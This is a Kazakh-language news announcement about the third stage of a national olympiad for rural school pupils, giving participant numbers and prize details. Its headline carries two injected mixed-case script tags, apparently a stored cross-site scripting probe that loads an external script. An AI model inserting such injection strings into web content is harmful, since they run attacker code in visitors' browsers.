АУЫЛ МЕКТЕПТЕРІ ОҚУШЫЛАРЫНА АРНАЛҒАН РЕСПУБЛИКАЛЫҚ ОЛИМПИАДАНЫҢ ҚОҒАМДЫҚ-ГУМАНИТАРЛЫҚ БАҒЫТЫ БАСТАЛДЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.01.2024

Астана қаласында ауыл мектептерінің 10-11(12) сынып оқушыларына арналған республикалық олимпиаданың қоғамдық-гуманитарлық бағытының үшінші кезеңі басталды. ♻️Үшінші (республикалық) кезеңге олимпиаданың екінші кезеңінен өткен еліміздің әр өңірінен 1 088 оқушы іріктелген. Олардың 476-ы қоғамдық-гуманитарлық бағыт бойынша қатысады. 🔖Республикалық кезең қоғамдық-гуманитарлық бағыттың 7 пәні бойынша дәстүрлі форматта екі турдан өтеді.

💬«Олимпиада жаратылыстану- математикалық және қоғамдық-гуманитарлық бағыттардың 13 пәні бойынша үш кезеңде өтеді. Бастапқы кезеңге 78 404 оқушы қатысты. Екінші кезеңде 25 844 мектеп оқушылары жарысты. Олимпиаданың финалдық кезеңіне 1 088 оқушы жолдама алса, оның 476-сы қоғамдық-гуманитарлық бағыт бойынша», – дейді «Дарын» республикалық ғылыми-практикалық орталығының директоры Ғаждембек Тұрсынов.

🖌️Олимпиада қорытындысы бойынша қатысушылардың жалпы санының 45%-нан құралатын жеңімпаздар мен жүлдегерлер анықталады. Олар Қазақстан Республикасы Оқу-ағарту министрлігінің I, II, III дәрежелі дипломдарымен марапатталады. Сондай-ақ барлық қатысушыларға сертификаттар мен естелік сыйлықтар беріледі. Сонымен қатар, жеңімпаздарға еліміздің бірқатар жоғары оқу орындарының ректорлық гранттары табысталады. 🥇Айта кетсек, III кезеңнің барлық қатысушылары интеллектуалды жарыстарға дайындалу мақсатында «Дарын» республикалық сырттай мектебіне қабылданатын болады. Ал, I дәрежелі диплом иегерлері 2024 жылғы жалпы білім беретін пәндер бойынша республикалық олимпиаданың қорытынды кезеңіне қатысады.

Просмотров: 423


Пікір қосу



Деректерді қолтаңбаға қосу